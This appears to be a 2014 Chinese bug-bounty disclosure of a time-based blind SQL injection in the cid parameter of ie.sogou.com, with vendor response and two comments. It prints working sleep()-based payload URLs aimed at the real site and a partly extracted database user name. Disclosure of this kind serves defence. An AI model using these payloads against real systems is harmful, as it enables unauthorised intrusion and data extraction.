漏洞概要
关注数(24)
关注此漏洞
漏洞标题:搜狗SQL注入3: ie.sogou.com上的MySQL注射
相关厂商:搜狗
提交时间:2014-10-14 23:27
修复时间:2014-10-18 22:41
公开时间:2014-10-18 22:41
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情
披露状态:
2014-10-14: 细节已通知厂商并且等待厂商处理中
2014-10-18: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
搜狗SQL注入3: ie.sogou.com上的MySQL注射
详细说明:
注入点:
http://ie.sogou.com/app/?default&api=12&cid=if(0,sleep(0),140)&p=1&route=tools/main/cate_recommend
参数cid未过滤,可注入。
测试:
http://ie.sogou.com/app/?default&api=12&cid=if(length(user())=1,sleep(1),0)&p=1&route=tools/main/cate_recommend
不延迟
http://ie.sogou.com/app/?default&api=12&cid=if(length(user())!=1,sleep(1),0)&p=1&route=tools/main/cate_recommend 延迟
可以判断注入存在。
http://ie.sogou.com/app/?default&api=12&cid=if(length(user())=21,sleep(1),0)&p=1&route=tools/main/cate_recommend 延时
可以判断当前user()长度为21,如图,后端timeout:
猜解时乱写的几行python脚本:
漏洞证明:
测试发现前一次sleep对后续的查询有影响,疑似数据库锁住。需要等待数据库重新苏醒。
脚本每次只取一个字符,等站点恢复可访问,才继续猜解下一个字符。
猜解得到的user()值: setoola@10.*
后端数据库不稳定,只猜到10,后面的字符未猜解。
代码胡乱写的,见谅,仅作个证明。
修复方案:
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-10-18 22:41
厂商回复:
您好,该漏洞已在SGSRC平台提交,并已修复,此处忽略,感谢支持,欢迎到SGSRC平台提交漏洞。
最新状态:
暂无
漏洞评价:
评论
-
2014-10-15 09:01 |
铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)
目测会忽略 SSRC上已提交过... 邮箱里还有注入没修复..快去
-
2014-11-03 08:45 |
Manning ( 普通白帽子 | Rank:559 漏洞数:78 | 就恨自己服务器太少)
主要关注这个猜测脚本,本来想看看怎么盲注判断,哈,有点小失望